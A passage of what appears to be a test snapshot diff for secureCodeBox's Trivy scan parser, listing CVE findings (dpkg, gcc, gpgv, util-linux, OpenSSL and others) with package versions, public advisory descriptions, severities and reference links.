"scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", + "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://avd.aquasec.com/nvd/cve-2021-36087", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-36087", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.19.8", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1664", - "installedVersion": "1.19.7", - "packageName": "dpkg", - "references": [ - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", - "https://lists.debian.org/debian-security-announce/2022/msg00115.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", - "https://security.netapp.com/advisory/ntap-20221007-0002/", - "https://ubuntu.com/security/notices/USN-5446-1", - "https://ubuntu.com/security/notices/USN-5446-2", - ], - }, - "category": "Vulnerability", - "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-1", + "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-2", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-12886", - "installedVersion": "8.3.0-6", - "packageName": "gcc-8-base", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libsmartcols1", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "8.3.0-6", - "packageName": "gcc-8-base", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "name": "double free after calling PEM_read_bio_ex", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.2.12-1+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-34903", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", - "references": [ - "http://www.openwall.com/lists/oss-security/2022/07/02/1", - "https://access.redhat.com/errata/RHSA-2022:6602", - "https://access.redhat.com/security/cve/CVE-2022-34903", - "https://bugs.debian.org/1014157", - "https://bugzilla.redhat.com/2102868", - "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", - "https://dev.gnupg.org/T6027", - "https://errata.almalinux.org/9/ALSA-2022-6602.html", - "https://errata.rockylinux.org/RLSA-2022:6602", - "https://linux.oracle.com/cve/CVE-2022-34903.html", - "https://linux.oracle.com/errata/ELSA-2022-6602.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", - "https://security.netapp.com/advisory/ntap-20220826-0005/", - "https://ubuntu.com/security/notices/USN-5503-1", - "https://ubuntu.com/security/notices/USN-5503-2", - "https://www.cve.org/CVERecord?id=CVE-2022-34903", - "https://www.debian.org/security/2022/dsa-5174", - "https://www.openwall.com/lists/oss-security/2022/06/30/1", - ], - }, - "category": "Vulnerability", - "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Signature spoofing via status line injection", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-34903", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6602", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-34903", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://bugs.debian.org/1014157", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2102868", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://dev.gnupg.org/T6027", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6602", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-1", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-2", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5174", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-14855", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-14855", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", - "https://dev.gnupg.org/T4755", - "https://eprint.iacr.org/2020/014.pdf", - "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", - "https://rwc.iacr.org/2020/slides/Leurent.pdf", - "https://ubuntu.com/security/notices/USN-4516-1", - "https://usn.ubuntu.com/4516-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-14855", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm. An attacker could use this weakness to create forged certificate signatures. This issue affects GnuPG versions before 2.2.18.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. + +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. + + + +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. + +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, 